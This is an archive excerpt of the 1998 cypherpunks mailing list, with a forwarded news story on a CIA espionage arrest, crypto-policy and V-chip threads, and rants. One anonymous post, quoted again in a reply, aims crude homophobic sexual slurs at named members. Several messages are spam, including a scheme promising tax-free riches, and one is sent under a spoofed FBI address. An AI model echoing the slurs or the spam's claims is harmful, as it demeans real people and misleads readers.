> .+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
> ======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 3 Apr 1998 22:00:20 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Ex-CIA Officer Charged with Spying (fwd)
Message-ID: <199804040558.XAA10728@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


nikst wrote:
> From nikst@glasnet.ru  Fri Apr  3 22:08:12 1998
> Message-Id: <m0yLKBy-001A7jN@mail.glas.apc.org>
> X-SMTP-Spy: Real message sender is nikst@glasnet.ru via ppp1575.glas.apc.org
> From: "nikst" <nikst@glasnet.ru>
> Subject: Ex-CIA Officer Charged with Spying
> 
> Friday April 3 5:01 PM EST 
> 
> Ex-CIA Officer Charged with Spying
> 
> By James Vicini 
> 
> WASHINGTON (Reuters) - A disgruntled former CIA officer has been arrested on
> spy charges
> alleging he passed secrets to two foreign nations about how the agency
> eavesdropped on their
> coded communications, U.S. officials said Friday. 
> 
> Douglas Groat, 50, who worked at the Central Intelligence Agency for 16 years
> until being fired
> in 1996, also was charged with trying to extort more than $500,000 from the spy
> agency in return
> for not revealing secrets to foreign governments. 
> 
> During a brief court hearing, a lawyer for Groat entered a not guilty plea to
> the five charges, two
> of which carry a possible death penalty. The case was the latest spy scandal to
> rock the CIA in
> recent years. 
> 
> U.S. Attorney Wilma Lewis said after the hearing that Groat participated during
> his CIA career
> in classified covert operations aimed at the penetration of cryptographic
> systems of foreign
> governments. 
> 
> He allegedly disclosed national defense information concerning the targeting
> and compromise of
> the cryptographic systems of two unidentified foreign governments to those
> governments, she
> told reporters outside the courthouse. 
> 
> The indictment alleged that he handed over the secrets to representatives of
> the foreign nation
> "with intent and reason to believe that said information would be used to the
> injury of the United
> States and to the advantage of a foreign nation." 
> 
> "The alleged unauthorized disclosure of these activities could have a
> significant impact on the
> national security of the United States," said Lewis, whose office will
> prosecute the case. 
> 
> "This case involves highly sensitive classified information that could have a
> serious impact on
> the national security of the United States. In short this is a serious
> espionage case," she said. 
> 
> The alleged espionage took place in late March and April 1997 while the alleged
> extortion
> scheme began in May 1996 and lasted until February 1998, the officials said.
> Groat was
> arrested by FBI agents without incident on Thursday. 
> 
> After prosecutors warned that Groat may try to flee the country, Chief U.S.
> District Judge Norma
> Holloway Johnson ordered Groat held without bond until next Thursday, when
> there will be
> another hearing. 
> 
> Prosecutor Eric Dubelier told the judge that Groat had been trained by the CIA
> "in traveling in
> false identification and deception." 
> 
> He said Groat possessed sensitive intelligence information which could cause
> "grave damage"
> to national security if disclosed. 
> 
> Groat, who was dressed in dark-blue prison clothing, stood before the judge
> during the hearing
> with his hands behind his back. Groat once conferred with his court-appointed
> lawyers, but
> never said anything during the proceeding held under unusually heavy security. 
> 
> George Tenet, the head of the CIA, said in a statement the full extent of any
> damage to national
> security has yet to be determined. 
> 
> "The charges against Mr Groat are extremely serious," Tenet said. "His arrest
> demonstrates that
> the U.S. government will not rest in our efforts against those who would commit
> espionage ...
> nor will we be intimidated by threats of blackmail." 
> 
> Groat worked as a technical officer in the CIA's Directorate for Science and
> Technology. He
> last had access to classified information in 1993, when he has placed on
> administrative leave. 
> 
> Officials said it will be up to Attorney General Janet Reno to decide whether
> to seek the death
> penalty in the case. They said the year-old investigation would continue. 
> 
> The case is the latest in a series of embarrassing spy cases involving the CIA.
> 
> 
> CIA turncoat Aldrich Ames was arrested in 1994 and has pleaded guilty to
> betraying at least 11
> Soviet and East European agents working for the United States in one of the
> most damaging
> espionage cases in U.S. history. 
> 
> Ames, a career officer who spent much of his 31 years in the CIA in
> counterintelligence, is
> serving a life sentence in a U.S. prison. 
> 
> Confessed double-agent Harold Nicholson pleaded guilty last year to spying for
> Moscow,
> becoming the highest-ranking CIA officer convicted in a spy case. 
> 
> Nicholson, a 16-year CIA veteran who uncloaked students he helped train for
> undercover
> missions, admitted collecting $300,000 from the Russians. 
> 
> **********
> 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 4 Apr 1998 02:45:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: V-Chip Reruns...
In-Reply-To: <199804030514.HAA26081@basement.replay.com>
Message-ID: <3.0.5.32.19980404012627.008b5c90@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:14 AM 4/3/98 +0200, Asynchronous wrote:
>"Once my daughter started reading books in the 'Goose Bumps'
>series", says one concerned parent, "reading became like an
>addiction to her."  Even though the books were so violent and
>scary the girl had nightmares.  "Soon she started reading beyond
>her grade level and was getting into books with 'adult themes'."
>The problem, say most busy parents, is that kids can visit
>the local library and borrow anything they choose, regardless
>of their family's values.

While this was a parody, I did recently see a TV news segment
discussing ratings regulations on TV and the Internet.
They interviewed one parent who was quite concerned -
her daughter had her own TV in her bedroom, and there
was no way to know what she might be watching, what with
cable tv carrying all sorts of things.....
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Sat, 4 Apr 1998 03:07:47 -0800 (PST)
To: "Bill Stewart" <cypherpunks@toad.com>
Subject: Re: V-Chip Reruns...
Message-ID: <003001bd5fca$5c72c5a0$1163a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain


A member of the Clinton/Gates ratpack wrote:

:While this was a parody, I did recently see a TV news segment
:discussing ratings regulations on TV and the Internet.
:They interviewed one parent who was quite concerned -
:her daughter had her own TV in her bedroom, and there
:was no way to know what she might be watching, what with
:cable tv carrying all sorts of things.....


Sounds like we need some federal, state, county, municipal and local
legislation passed in regard to these concerns.
I think it should involve felony convictions for both the parent and the
child.

When criminal records are outlawed, only outlaws will have criminal
records...I think...

~~~~
Toto  <toto@sk.sympatico.ca>
~~~~
"The Xenix Chainsaw Massacre"
http://www.clas.net/~dave/public/xenix

"WebWorld & the Mythical Circle of Eunuchs"
http://www.clas.net/~dave/public/webworld

"InfoWar -- The Digital Revolution"
http://www.clas.net/~dave/public/infowar3

"Space Aliens Hide My Drugs"
http://www.clas.net/~dave/public/sahmd






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 4 Apr 1998 07:52:23 -0800 (PST)
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: ROTFL!
In-Reply-To: <199804041124.NAA29738@basement.replay.com>
Message-ID: <199804041551.JAA14757@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Thanks(spit)

igor

Anonymous wrote:
> 
> 
>     Do any of you cocksuckers know where the following comes from?  URL?
> 
> A shit-eating grin spread across Dr. Vulis' face as he realized that, this
> time, he had been caught for doing something he wouldn't be punished for.
> Rewarded, perhaps?
> Cautiously, Dr. Vulis asked Igor, "So can I have more medication? All of the
> others in treatment here are getting better drugs than me, because they are
> patients being treated by doctors. Why am I the only doctor being treated by
> a patient?"
> 
> "Now Dimitri," Igor shook his head, negatively, "you are exaggerating again.
> You know that John Young and Robert Hettinga are the only two here who are
> getting better drugs than you, and it is only occasionally, when they share
> a room, and then only in order to increase their pleasure when they engage
> in...uuhhh...CypherPunk activities."
> 
> Dimitri got angry, as Igor knew would result from feeding his fantasies, "I
> know what you're talking about!" Dimitri always got...uuhhh...'excited', when
> this subject came up.
> "They're sucking each other's cocks! This place is full of cocksuckers, and
> the biggest one of all is cocksucker John <spit> Gilmore <fart>!"
> 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Sat, 4 Apr 1998 09:11:19 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: V-Chip Reruns...
Message-ID: <199804041711.MAA18427@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 4/4/98 8:04 AM, Toto (toto@sk.sympatico.ca)  passed this wisdom:

>A member of the Clinton/Gates ratpack wrote:
>
>:While this was a parody, I did recently see a TV news segment
>:discussing ratings regulations on TV and the Internet.
>:They interviewed one parent who was quite concerned -
>:her daughter had her own TV in her bedroom, and there
>:was no way to know what she might be watching, what with
>:cable tv carrying all sorts of things.....
>

 Not to sound like a first amendment basher, but if these parents are
worried about what their daughter is viewing on her own TV in the
bedroom, why don't they take it the hell out of there and have her watch
TV in the family room. The implication is that she is young enough for
them to be concerned about her impressionability. If she is that young,
isn't that simply good parenting? Seems to me like a no brainer ... but
then again, what the hell do I know .. I raised four kids (youngest 16)
who all seem to have their heads on reasonably straight and have yet to
be named in any indictments.

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEUAwUBNSZpqj7r4fUXwraZAQFzswf3Q/qvIBVtGf935EiVL2QMPOucfx1WiOAv
3X1j1d5J58hFoLjdOEtCXCkMj0EecugXd9gL47bAW+HTBAD5h2rNKvyvoWCwksn2
EcYPj/1GMweMUUrfHwQ/TNVdkMRF0zTN3zVItwDlrIWqdpLSfzoWea/kWOuI2mNz
g8zwBz8L/AfEPeqJVhTpPtLnDsxaHuYioSliPdGc8Vwt2k+56axScqgXhysivjpI
SOhStm9LiJrkkTo2h15MwbSJWlWMt+HTs9Rmt+QGq72cba+sXIcsNoYn0NpG0mVJ
QIM3ZS93vCJuH7W4FxoirmZrwoG1NZtFLGmlMZMTfKxhI0Ca7kU9
=anJu
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
 For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

 "But it is said: Do not meddle in the affairs of wizards, for they are 
subtle 
  and quick to anger." - Gildor (_The Lord of the Rings_, by J.R.R. 
Tolkien)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: promote@mlsa1.com
Date: Sat, 4 Apr 1998 09:26:39 -0800 (PST)
To: promote@mlsa1.com
Subject: MINI DISH Satellite retailers ....
Message-ID: <199804041726.JAA07197@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


///////////////////////////////////////////////////////////////////////////////
to be removed simply press reply and send,  this message is targeted to retailers of minidish
satellite systems
////////////////////////////////////////////////////////////////////////////////

As all of the minidish satellite companies begin to offer the capablities of viewing the INTERNET

why not join our program and become an internet service provider.

The following is an out line of our service
No Set up fee!!!
$17.95 per month fee
Unlimited access
Free 5 mb of web space
Group Medical Benefits
Group Legal Service
Mail order Prescription Card
Discounted Computer Equipment
and more.....

You can be come a Charter Reseller,during our intro period, for only $50 start up cost.

You will recieve 25 cd's of Browser software that you can retail for $5-10 each (value $125)
You will recieve a monthly residual from $1-$3 per month dependent on the number of customers you have online.
You will receive a free website, free design, free promotion (value $450) for as long as you are a reseller
AND MORE

To be a Charter Reseller you must join before our launch of April 15,1998.

This program will allow you to generate additional income as you can provide internet service to everyone who enters your store wheter they purchase a mindish or not

for more info email promote@mail.datanet.com.mx and type "my isp" in the subject
include a fax number for more info






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 4 Apr 1998 09:25:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: HIRF/EMI Source
Message-ID: <199804041725.MAA05651@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The USAF's 22-volume 1996 investigation of the Ron Brown
plane crash supposedly offers in Volume 2 one of the best 
unclassified recent accounts of High Intensity Radio Frequency 
(HIRF) and electromagnetic interference (EMI). 

We've been told that the report's available only in hardcopy 
from the Air Force -- a few copies were publically released
in June 1996 at a Pentagon press conference. We'd like to 
get a copy of Volume 2 to scan the HIRF and EMI parts but 
cannot locate the proper office for a request -- www.af.mil 
does not appear to offer the report.

We'd appreciate hearing from anyone who might have 
access to Volume 2 and would be willing to loan or know 
how we can get it.

-----

State's Jamie Rubin yesterday confirmed Russia's SIGINT
operation at Lourdes, Cuba but declined comment on the US 
counterpart. Dave Emery wrote about this awhile back:

   http://jya.com/rusigint.htm

Someday we might learn what the US military knows about 
EMI attacks on critical infrastructure, planes, ships, trains and 
limos -- theirs and ours.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 4 Apr 1998 03:24:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: ROTFL!
Message-ID: <199804041124.NAA29738@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


    Do any of you cocksuckers know where the following comes from?  URL?

A shit-eating grin spread across Dr. Vulis' face as he realized that, this
time, he had been caught for doing something he wouldn't be punished for.
Rewarded, perhaps?
Cautiously, Dr. Vulis asked Igor, "So can I have more medication? All of the
others in treatment here are getting better drugs than me, because they are
patients being treated by doctors. Why am I the only doctor being treated by
a patient?"

"Now Dimitri," Igor shook his head, negatively, "you are exaggerating again.
You know that John Young and Robert Hettinga are the only two here who are
getting better drugs than you, and it is only occasionally, when they share
a room, and then only in order to increase their pleasure when they engage
in...uuhhh...CypherPunk activities."

Dimitri got angry, as Igor knew would result from feeding his fantasies, "I
know what you're talking about!" Dimitri always got...uuhhh...'excited', when
this subject came up.
"They're sucking each other's cocks! This place is full of cocksuckers, and
the biggest one of all is cocksucker John <spit> Gilmore <fart>!"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: promote@mlsa1.com
Date: Sat, 4 Apr 1998 15:09:36 -0800 (PST)
To: promote@mlsa1.com
Subject: MAKE MONEY AND LIVE WELL!!!
Message-ID: <81193368_94580684>
MIME-Version: 1.0
Content-Type: text/plain



Tax Free Income!!

For a one time payment of only
$50.00 and our one page flyer,
anyone can become rich and keep it.

For information on the BEST, SIMPLEST
and EASIEST program ever, call our Fax
On Demand at 281 890 3370 ext. 191

or write to:

New Found Wealth
4001 South 700 East
Suite500 Dept 2
Salt Lake City, Utah 84107      




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: FBI@FBI.GOV
Date: Sat, 4 Apr 1998 22:37:24 -0800 (PST)
To: @toad.com
Subject: Please Read
Message-ID: <199804050637.WAA26365@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/html



&ltA HREF="http://www.electriciti.com/ldagrosa"&gtCLICK HERE!! free pics!!</A>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 5 Apr 1998 15:37:03 -0700 (PDT)
To: David Honig <honig@otc.net>
Subject: Re: What's up in SASEBO, or Don't Tug The Beard
In-Reply-To: <3.0.5.32.19980405112845.007c1990@otc.net>
Message-ID: <199804052236.SAA32290@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


David Honig wrote:

>From: "George Martin" <gmartin@usonet.ne.jp>
>
>>Maybe you should've checked out the url to see if it was
>>valid before you shot your mouth off in public... The file
>>was removed quite a few months ago and was never download
>>by anyone outside of the .mil domain.  Take your
>>troublemaking somewhere else.
>
>I of course informed him that he was mininformed or uninformed.

Correct, David. Following your notice, we saved Ft. Bragg's
utility listing on April 2 and downloaded its military-grade pgp262 
for patriotic display in the public interest at:

   http://jya.com/pgp-mil-export.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 5 Apr 1998 10:05:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199804051705.TAA08923@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perhaps the most defining feature of the CypherPunks was that they strove
to 'walk their talk', as the saying was in those days. While they decried
the increasing infringement of central authority on the freedom and privacy
of the individual, which was near its zenith at that point in time, they
chose to fight for the right to be self-willed, rather than to impose their
will and beliefs on others.
"Instead of concentrating their efforts on forcing the authorities to acting
rightly, in the interests of freedom and privacy, they focused on routing
around the impositions and infringements that the governments and dark
forces of that era enacted to try to contain them.
"John Gilmore, one of the CypherPunks founders, often said, 'The InterNet
interprets censorship as damage, and routes around it.' Very Taoist." Bubba
concluded.

Jonathan spoke softly, quoting a section of the Tao Te Ching which had been
a particular favorite of his grandfathers,
"A man of Virtue performs his part,
"But a man without Virtue requires others to fulfill their obligations.
"The Tao of heaven is impartial.
"It stays with good men all the time."

http://bureau42.base.org/public/xenix






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 6 Apr 1998 05:10:15 -0700 (PDT)
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: Leahy's Crypto Wake-up Call
In-Reply-To: <3.0.5.32.19980405232651.0089bb10@popd.ix.netcom.com>
Message-ID: <199804061210.IAA23492@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


In <3.0.5.32.19980405232651.0089bb10@popd.ix.netcom.com>, on 04/05/98 
   at 11:26 PM, Bill Stewart <bill.stewart@pobox.com> said:

>>>  Third, legislation should establish both procedures and 
>>>standards for access by law enforcement to decryption keys 
>>>or decryption assistance for both encrypted communications 
>>>and stored electronic information and only permit such access  upon court
>>>order authorization, with appropriate notice and  other procedural
>>>safeguards;
>>
>>And just *how* do they plan on doing this without either backdoors or
>>escrow??

>Easy, Constitutional, and doesn't need any new legislation -  all you
>need is a warrant or subpoena to tell anybody to produce those records
>and materials they have.
>If they didn't save a recording of their telephone call or email, or
>think the Fifth Amendment reasonably prohibits them
>from being compelled to incriminate themselves,
>then the prosecution doesn't get anything.  No problem,
>and it's worked quite well for 200+ years.

Well call me a cynic but in reading section #3 I take that as to mean
access without the help or cooperation of the person(s) who did the
encryption.

If they are willing to rely on the Constitution then why push for new, and
as you mentioned, unneeded legislation?

I think the rest of this is just window dressing for organizations like
the EFF, et al who are just bursting to make a deal.


I smell a lawyer in the woodpile.

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dental@cheerful.com
Date: Sun, 5 Apr 1998 19:07:03 -0700 (PDT)
Subject: $9 dental, vision & prescription drugs plan
Message-ID: <199804060206.TAA18463@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


****************************************************************
This is not unsolicited email.
Your email address was routed to our "auto send" program stating 
that you wish to receive information about our dental, vision & 
prescription drug program. If your email address was referred to 
our "auto send" in error, please type "REMOVE" in the subject 
line and the "auto send" will remove your email address.
****************************************************************


******* DENTAL PLAN

$9 per month for a single person
$15 per month for entire household, (everyone at your house)

**No waiting period, No limit on visits or services, Braces 
included, Cosmetic dentistry included, specialist included, 
pre-existing conditions are covered, No deductible, No age limit, 
No claim forms, You can change dentist whenever you want.

******* VISION CARE

Free with $9/$15 dental plan

**Over 12,000 optical providers nationwide, save up to 60%, save 
up to 60% on contact lenses, save up to 30% on eye exams and 
surgery, save up to 50% on all non-prescription sunglasses, 30 
day unconditional money back guarantee, only national plan 
endorsed by the Opticians Association of America.

******* PRESCRIPTION DRUGS

Free with $9/$15 dental plan

**Over 35,000 retail pharmacy locations nationwide including most 
chain pharmacies and independent pharmacies, save up to 50% on 
prescription drugs, all prescription drugs are covered both at 
the retail pharmacy and by mail order.

If you want to sign up for the dental program just follow the 
directions below. 

FAX the following to DENTAL PLAN. 
The fax number is 1-713-266-0390.

DENTAL PLAN
Name
Address
City, State, Zip code
Day Phone #
Night Phone #
Fax Phone #
Email address

We are currently needing brokers for the $9/$15 Dental Plan. If 
you or someone you know is looking for an additional income 
PLEASE LET US KNOW when you fax the above information. The Dental 
Broker program has a nice up front pay cycle and a very good 
residual for as long as the person is in the dental plan. And 
there is no license required to be a broker.

So let us know about the dental and if you know of someone 
wanting to be a broker. Tell them to contact us by faxing the 
same information.

Thank you again for your interest.

Cliff





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Toto" <toto@sk.sympatico.ca>
Date: Sun, 5 Apr 1998 19:10:33 -0700 (PDT)
To: "CypherPunks" <cypherpunks@toad.com>
Subject: April Fool ! / Off-schedule, off-topic, or out-of-sync?
Message-ID: <001701bd6100$d9911460$2c62a58e@uymfdlvk>
MIME-Version: 1.0
Content-Type: text/plain


  Strange things happen when one gets sucked into a BlackHole TimeWarp
filled with imaginary Outlaw Quarks and PseudoReptilian Identity-Bots.
  When this happens, and you just have to *tell* somebody, there is nowhere
to turn except to the CypherPunks Disturbed Male List, where this kind of
thing seems to happen all the time, judging from the multi-dimensional
personalities displayed by various list members in both their 'consistent'
(hee-hee) and 'adjustable' list personas.

  I woke up this morning to discover that my world had been turned upside
down by the ancient ancestor and fortuitous forerunner of the Y2K Bug--the
H1H Mite.

  The H1H Mite, kissing cousin to the Snipe, exists only in men's minds
(hence its proximity to April 1st) but, like the infield-fly rule, it is
recognized as a living, breathing entity deserving of recognition,
regulation, and even it's own pseudo-jingle--"Spring forward, fall back."

  Having spent a good part of my life living in Arizona and Saskatchewan,
where we, like the sun, moon and stars, sit back on our lazy asses while the
majority of the world is springing forward and falling back through the
time-space continuum, I am used to watching huge masses of people 'gain' and
'lose' a piece of the solar time-pie to the Tick-Tock TimeWarp and jump
through the various hoops necessary to make certain that the Sacred Clock of
Tick-Tock is not fooled into shorting or longing (?) the various elements of
Sacred Time, such as paychecks, billing periods, interest charges, etc.

  When I saw my computer clock had 'sprung forward,' even though it does not
contain any of the springs and such which are historically an element of
Sacred Time, I took the time to jump into the appropriate area of my system
and hit it hard enough so that my clock 'fell back' to where Mother Nature
had intended for it to remain. I also took the time to solve my H1H Mite
problem by re-clicking the code-generated symbol which graphically
rearranges the rest of the virtual world so that the (GMT -6:00 No Daylight
Savings) Sacred TimeZone hovers over my computer and pronounces it to now
officially be in Saskatchewan, though I, personally, never saw it move.
  The H1H Mite did cost me a bit of time and trouble to eradicate, as well
as a small amount of computer resources, but,. enterprising genius that I
am, I did not lose the ranch, the family fortune, or even miss a meal, as a
result of the having to deal with the little critter on my own in-house
computer system. The effect of the H1H Mite on the part of my environment
which falls outside of my control, however, had potentially devastating
consequences.

  Upon waking this morning and checking Channel 10, which shows the
currently scheduled TV shows, I quickly noticed that the Preview Channel
Sacred Clock had 'sprung forward,' dragging the schedule along in its wake.
  The stability of my whole world was, as a result, thrown into complete
turmoil, and it was only a few hours later, when some Blessed Angel of Mercy
corrected the situation, that my world regained some semblance of normality.
Now I understood how the people who are used to watching Jerry Springer in
the mornings on WUHF-TV felt when the station moved the show to the
afternoon, in order to herd Jerry Springer fans into the trough next to
their Sacred Five O'Clock News feeding pen.
  The experience of turning to a certain channel to watch a 'listed' show
and stumbling into a BlackHole in which I was subjected to the sights and
sounds of unusual and/or unfamiliar combinations of electronic bytes flying
by had struck such terror into me that I now understood why Jerry Springer's
morning fans had deluged WUHF-TV with demands that the show be switched back
to its normal morning schedule. It also explained an event that I had
witnessed, and had thought rather 'normally bizarre' at the time, in terms
of the vulnerability of those addicted to the ElectronOpiate when threatened
with the disruption of their scheduled fix.

  The VicePres/GenMan of  WUHF-Detroit had, during an important, highlighted
Editorial Sight&Sound Byte, solemnly explained to the JerryJunkies that the
purpose of the time-move had been to prop up the station's Sacred Five
O'Clock NewsTeam, which apparently was not serving a 'slop' of sufficient
quality that would entice FreeRanging TVSheeple to be attracted to the
trough from wherever else they happened to be grazing at the time. He
proceeded to explain that they had moved their most popular feeding pen next
to their Sacred NewsFeed Trough in order to make the trough the easiest
choice for those who had not been sated by the physical and emotional
violence of the Jerry Springer Feeding Pen, and wanted to drink up the blood
and chew on the pieces of flesh thrown into the Sacred Five O'Clock News
Trough.
  What I found bizarre and troubling was that the BigShot then proceeded to
sound genuinely hurt that the station had--in moving the show back to its
morning time slaught (not a typo) out of a genuine concern arising from the
painful bleats of the many TVSheeple  who cried out to the station in agony
when their JSFix failed to arrive on time--somehow become 'victimized' in
the process.Taking a page or two out of the PBS fundraising encyclopaedia,
he pointed out that, in view of the fact that WUHF-TV had acted so
self-lessly in coming to the aid of those who the station was generously
providing with their MorningFix, that WeTheSheeple were now somehow
obligated to repay that generosity by getting their EveningFix from the
WUHF-TV connection, even if it meant leaving their current grazing area near
a NewsFeed Trough with superior swill, and supporting WUHF-TV's
EveningConnection, even though the NewsFix they provided would not provide a
NewsBuzz comparable to that of their competitors.
  Not only were the subliminal digital implants of the PBS GuiltMobile
blatantly being hijacked for the use of a commercial TV station, but the
BigShot from ProfitTV also invoked the unspoken VeiledThreat that, if the
TVJunkies failed to comply, there was the possibility that the Sheeple would
no longer have their JerrySpringerFix Connection to kick around any more.

  As a result of being tossed back and forth in unfamiliar virtual territory
as a result of the intrusion of the H1H Mite in my life, I found myself
objectively viewing the Sight&Sound Bytes that passed randomly through my
perceptive field, without benefit of the usual AutoProgrammed ThoughtHelper
spices been added to the mix of the slop being served up to my  normally
nondiscrimatorial palete.
  Thus it was that, not being preprogrammed and already caught up in the
'story' being promoted by the narrators of a women's tennis tournament in
South Africa, I was able to notice that the woman who lost the championship
match seemed to take it as a matter of stride when she came up short, as
well as the shit-eating grin she had on her face when the SecondGuy
expressed regret for having to hand her a check for only $60,000, and then
proceeded to give an unusually deep and prolonged advertising sound-byte for
the loser's skill, character, and value to her country.
  I also found myself able, not having been hypnotized into believing
anything the narrator's voices told me, to connect the dots between various
facts which quickly became obvious.
1. This was a Special Anniversary of  the Tournament.
2. This was the first time a homegrown Cinderella had won the tournament.
3. The Story Book Ending (TM) was worth a fortune to the club, country and
sponsers.
4. Cinderella had entered the tournament "to practice." She came out of
nowhere, to win.
5. Her opponent in the final committed 51 "unforced errors" in two short
sets.
6. Ms. Cinderella was backed by the deep pockets of Nike.

  I find it notable that the short reality-shock delivered by my cable
company's fumbling of the ball in dealing with the H1H Mite, for a
relatively short period of time, could result in my being roused from my
comfortable TVReality Slumber to the extent that I would be forced to use my
senses to interpret the information input being digitally transferred to my
brain, instead of having it automatically pre-categorized for insertion to
the proper VirtualReality Slot.
  The Automatic Doors of Perception slid open so widely that I could now
recognize the operation of universal human qualities and impulses which are
normally veiled from our consciousness by the fog of the repetitively banal
OfficialStory to which we are invariably subjected to by those we have
chosen as our RealityReporters, be they reporters, columnists, advertisers,
spin-doctors, authority-figures, or whatever...
  In the disorientation of my Regular Programming (pardon the pun), I could
clearly see the same human quality of conscience, and impulse to confess,
that results in:
1. Criminals unexpectedly facing questioning by Mr. GoodGuy and Mr. BadGuy,
and letting leak details of the Forbidden Truth in regard to the crimes they
have committed because of the remaining vestiges of resistance that their
TrueSoul has to THE LIE.
2. Tennis champions unexpectedly thrown into the limelight letting leak the
fact that their victory was the direct result of their opponent's
unperterbed demeanor in handing them the championship on a silver platter.
Tournament Chairpersons being unable to speak a single sentence without some
unconscious reference to the tremendous promotional and monetary benefit
resulting from Cinderella taking center stage in the GreatPlay which had
just been 'produced.'
3. TruthMongers with a history of laughing at the stupidity of the
AutoProgrammed Sheeple becoming so shell-shocked and disoriented by a minor
disruption of their normal routine that they let leak the fact that they are
merely a member of an equally programmed Sheeple of One Cult which considers
itself to be a cut above those who the MindMasters are carving into steaks
in preparation for their being fed to the insatiable appetites of the
PowerMongers.

  All of which leads me to wonder:
1. If the minor glitches resulting from the H1H Mite are capable of such
radical reorientation of the Automatic Doors of Perception in an Elite
Sheeple such as myself, then what will be the capacity of a vastly more
encompassing Millennium bug for causing members of the Great Herd to lose
their bearings and turn into a disoriented, scattered mass so desperate for
a Savior (TM) to show them back to their comfortable feeding pens that they
are willing to ignore the slaughter houses being built beside them.
2. How many of the Sheeple, forced by circumstances to look up from the
feeding trough, will notice what big eyes and teeth the SheepHerders have,
and realize that their self-interests might be better served by engaging in
an evolutionary mutation into a more predatorial species.
3. Will a Silver Bullet kill a Vampire Clock which sucks an hour out of
Sacred Time?
4. How many Silver Bullets does it take to kill a Millennium Bug?

"Harassment and oppression are a small price to pay for living in the land
of the free."
 ~ Nuclear PowerMonger (Homer's boss, on 'The Simpsons')

~~~~
Toto  <toto@sk.sympatico.ca>
~~~~
"The Xenix Chainsaw Massacre"
http://bureau42.base.org/public/xenix

"WebWorld & the Mythical Circle of Eunuchs"
http://bureau42.base.org/public/webworld

"InfoWar -- The Digital Revolution"
http://bureau42.base.org/public/infowar3

"Space Aliens Hide My Drugs"
http://bureau42.base.org/public/sahmd






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 6 Apr 1998 07:45:23 -0700 (PDT)
To: "Toto" <toto@sk.sympatico.ca>
Subject: Re: So we can expect lower taxes, now...right?
In-Reply-To: <00ec01bd6158$78aa87a0$0963a58e@uymfdlvk>
Message-ID: <199804061444.KAA25275@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


In <00ec01bd6158$78aa87a0$0963a58e@uymfdlvk>, on 04/06/98 
   at 06:32 AM, "Toto" <toto@sk.sympatico.ca> said:

>Milken was held
>up and robbed by the SEC in broad daylight for no other reason than the
>power the SEC has to extract ransoms from chosen victims."

>Furthermore, Robert concludes, "...What we have witnessed is a
>conspiracy between the SEC and the Justice Department to rob a man of $47
>million."

    The fact that government "officials" would use their power to extort
money should not come as a shock to anyone (absolute power corrupts
absolutely).

    Why they were allowed to get away with it is the interesting part.

    There is an underlying hatred of success in this country. The vast
majority of Americans loath anyone who has done better for themselves than
they have (better know as the sin of envy). This was not always the case.
